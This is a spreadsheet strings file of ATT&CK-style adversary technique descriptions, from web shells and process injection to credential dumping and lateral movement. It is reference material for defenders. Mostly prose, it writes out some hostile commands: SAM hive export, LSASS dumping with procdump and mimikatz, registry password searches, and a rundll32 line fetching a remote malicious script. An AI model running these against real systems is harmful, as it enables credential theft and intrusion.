    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.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Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.
The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.</t>
  </si>
  <si>
    <t>Web Shell</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</si>
  <si>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client).1
Web shells may serve as Redundant Access or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation Event Subscription</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</si>
  <si>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scripts.1 Examples of events that may be subscribed to are the wall clock time or the computer's uptime.2 Several threat groups have reportedly used this technique to maintain persistence.</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.1
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse:1
Winlogon\Notify - points to notification package DLLs that handle Winlogon events
Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>C2</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
TCP:80 (HTTP)
TCP:443 (HTTPS)
TCP:25 (SMTP)
TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol.
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are
TCP/UDP:135 (RPC)
TCP/UDP:22 (SSH)
TCP/UDP:3389 (RDP)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Connection Proxy</t>
  </si>
  <si>
    <t>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.1
The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
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</si>
  <si>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Custom Command and Control Protocol</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols.</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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systems.12 Some data encoding systems may also result in data compression, such as gzip.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Domain Fronting</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.1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</si>
  <si>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Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</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</si>
  <si>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</si>
  <si>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 in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Remote Access Tools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</si>
  <si>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adversaries.1
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t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</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</si>
  <si>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</si>
  <si>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Standard Cryptographic Protocol</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</si>
  <si>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</si>
  <si>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Standard Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.1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hosts;2 however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
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</si>
  <si>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Access Token Manipulation</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>AOO-Privesc</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</si>
  <si>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runas. 1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system.2
Access tokens can be leveraged by adversaries through three methods:3
Token Impersonation/Theft - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.
Create Process with a Token - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW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
Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.
Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. 4 The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. 5</t>
  </si>
  <si>
    <t>For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges.3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privileges.3</t>
  </si>
  <si>
    <t>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library.1 Similar to Process Injection, these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.2
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.3</t>
  </si>
  <si>
    <t>To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to Hooking, utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.</t>
  </si>
  <si>
    <t>Bypass User Account Control</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</si>
  <si>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action.1
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box.23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user.4 Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.
Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods5 that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
eventvwr.exe can auto-elevate and execute a specified binary or script.67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integrity.8</t>
  </si>
  <si>
    <t>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</si>
  <si>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Exploitation for Privilege Escalation</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</si>
  <si>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</si>
  <si>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Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Execution granted through EWM injection may take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.4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t>
  </si>
  <si>
    <t>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</si>
  <si>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Process Injection</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</si>
  <si>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multiple approaches to injecting code into a live process. Windows implementations include:1
Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.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issue.2
Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5
Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.6</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.1 An account can hold additional SIDs in the SID-History Active Directory attribute2, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values3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 Windows Admin Shares, or Windows Remote Management.</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>AOO-Evasion</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with.1 However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries2. The certificates used during an operation may be created, forged, or stolen by the adversary.34
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform.1
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.</t>
  </si>
  <si>
    <t>DCShadow</t>
  </si>
  <si>
    <t>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC).12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hash.3
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors).1 The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence.</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests1 are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.2
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>Deobfuscate/Decode Files or Information</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</si>
  <si>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Scripting, PowerShell, or by using utilities present on the system.
One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.1
Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.2
Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with Obfuscated Files or Information during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.3 Adversaries may also used compressed or archived scripts, such as Javascript.</t>
  </si>
  <si>
    <t>Disabling Security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</si>
  <si>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</si>
  <si>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Exploitation for Defense Evasion</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</si>
  <si>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 The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>File Deletion</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</si>
  <si>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 functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools.</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</si>
  <si>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</si>
  <si>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tools.1
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. 
Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.</t>
  </si>
  <si>
    <t>Indicator Blocking</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</si>
  <si>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</si>
  <si>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Indicator Removal from Tools</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</si>
  <si>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t>
  </si>
  <si>
    <t>Indicator Removal on Host</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</si>
  <si>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</si>
  <si>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Indirect Command Execution</t>
  </si>
  <si>
    <t>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Command-Line Interface, Run window, or via scripts.12
Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd.</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</si>
  <si>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</si>
  <si>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certificate.1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credentials.2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t>
  </si>
  <si>
    <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe.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t>
  </si>
  <si>
    <t>Masquerading</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</si>
  <si>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
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe.1 An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths.2
An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".</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</si>
  <si>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</si>
  <si>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 may be used for local or remote Registry modification.1 Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system.2 Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.</t>
  </si>
  <si>
    <t xml:space="preserve">Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2
Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567
Files may be executed by mshta.exe through an inline script: mshta </t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.1 Within MFT entries are file attributes,2 such as Extended Attributes (EA) and Data [known as Alternative Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).1345
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command.1
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</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</si>
  <si>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</si>
  <si>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 for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.1 Adversaries may also used compressed or archived scripts, such as Javascript.
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.2 Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.3
Adversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms.456
Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server.7 By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.1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opened.2 To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.3
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.4
Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing,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SetThreadContext.4
Process Doppelgänging is implemented in 4 steps4:
Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
Load – Create a shared section of memory and load the malicious executable.
Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
Animate – Create a process from the tainted section of memory and initiate execution.</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to Process Injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis.</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</si>
  <si>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multiple approaches to injecting code into a live process. Windows implementations include:1
Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.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issue.2
Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5
Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point.</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t xml:space="preserve">Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information.1 Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware.2
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. </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</si>
  <si>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be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1
Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Software Packing</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</si>
  <si>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available,1 but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Timestomp</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</si>
  <si>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</si>
  <si>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Account Manipulation</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>AOO-Cred</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</si>
  <si>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In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.1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policies.2
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t>
  </si>
  <si>
    <t>Credential Dumping</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</si>
  <si>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
Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.   A number of tools can be used to retrieve the SAM file through in-memory techniques:
pwdumpx.exe
gsecdump
Mimikatz
secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
reg save HKLM\sam sam
reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.1
Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+.
Cached Credentials
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
pwdumpx.exe
gsecdump
Mimikatz
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes: Cached credentials for Windows Vista are derived using PBKDF2.
Local Security Authority (LSA) Secrets
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
pwdumpx.exe
gsecdump
Mimikatz
secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation.
NTDS from Domain Controller
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controller.2
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.  
Volume Shadow Copy
secretsdump.py
Using the in-built Windows tool, ntdsutil.exe
Invoke-NinjaCopy
Group Policy Preference (GPP) Files
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on-line.34   The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:  
Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
Get-GPPPassword5
gpprefdecrypt.py
  Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s *.xml
Service Principle Names (SPNs)
See Kerberoasting.
Plaintext Credentials
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
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exchanges.6 Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.7   The following tools can be used to enumerate credentials:  
Windows Credential Editor
Mimikatz
  As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.   For example, on the target host use procdump:
procdump -ma lsass.exe lsass_dump
  Locally, mimikatz can be run:
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords
DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API)891011 to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data 12 from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket13 or change an account's password as noted in Account Manipulation.14 DCSync functionality has been included in the "lsadump" module in Mimikatz.15 Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.</t>
  </si>
  <si>
    <t>Credentials in Files</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</si>
  <si>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Dumping.1 Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.</t>
  </si>
  <si>
    <t>Credentials in Registry</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</si>
  <si>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information:1
Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
Current User Hive: reg query HKCU /f password /t REG_SZ /s</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</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</si>
  <si>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permissions.12 Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Forced Authentication</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</si>
  <si>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1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443.23
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary,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server.4 With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials, or reuse it for Pass the Hash.5
There are several different ways this can occur.6 Some specifics from in-the-wild use include:
A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.7
A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,1 but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.2
Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping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 and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.</t>
  </si>
  <si>
    <t>Input Prompt</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</si>
  <si>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set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "") 1
Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Service principle names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service1).2345
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).67 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.765
This same attack could be executed using service tickets captured from network traffic.</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning</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</si>
  <si>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name.12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 and crack the hashes offline through Brute Force to obtain the plaintext passwords.</t>
  </si>
  <si>
    <t>Network Sniffing</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</si>
  <si>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techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</t>
  </si>
  <si>
    <t>Password Filter DLL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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actors.2
Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials.</t>
  </si>
  <si>
    <t>Application Deployment Software</t>
  </si>
  <si>
    <t>Lateral Movement</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</si>
  <si>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</si>
  <si>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Distributed Component Object Model</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)1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
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.234 By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications5 as well as other Windows objects that contain insecure methods.67 DCOM can also execute macros in existing documents8 and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application9, bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</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</si>
  <si>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SMB1 and RDP2 as well as applications that may be used within internal networks such as MySQL3 and web server services.4
Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Pass the Ticket</t>
  </si>
  <si>
    <t>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 are captured by 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access.12
Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).1
Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</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</si>
  <si>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(RDS).1 There are other implementations and third-party tools that provide graphical access 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 technique for Persistence.2
Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.3 This can be done remotely or locally and with active or disconnected sessions.4 It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf.</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Taint Shared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</si>
  <si>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 of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories.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t>
  </si>
  <si>
    <t>Windows Admin Shares</t>
  </si>
  <si>
    <t>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 to remotely access a networked system over server message block (SMB)1 to interact with systems using remote procedure calls (RPCs),2 transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.3
The Net utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials.</t>
  </si>
  <si>
    <t>Audio Capture</t>
  </si>
  <si>
    <t>Collection</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</si>
  <si>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</si>
  <si>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Automated Collection</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</si>
  <si>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
This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.
Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.</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</si>
  <si>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</si>
  <si>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Policies, procedures, and standards
Physical / logical network diagrams
System architecture diagrams
Technical system documentation
Testing / development credentials
Work / project schedules
Source code snippets
Links to network shares and other internal resources
Common information repositories:
Microsoft SharePoint
Found in many enterprise networks and often used to store and share significant amounts of documentation.
Atlassian Confluence
Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>Data from Local System</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</si>
  <si>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t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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 may be used to gather information.</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>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Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.1
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.23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t>
  </si>
  <si>
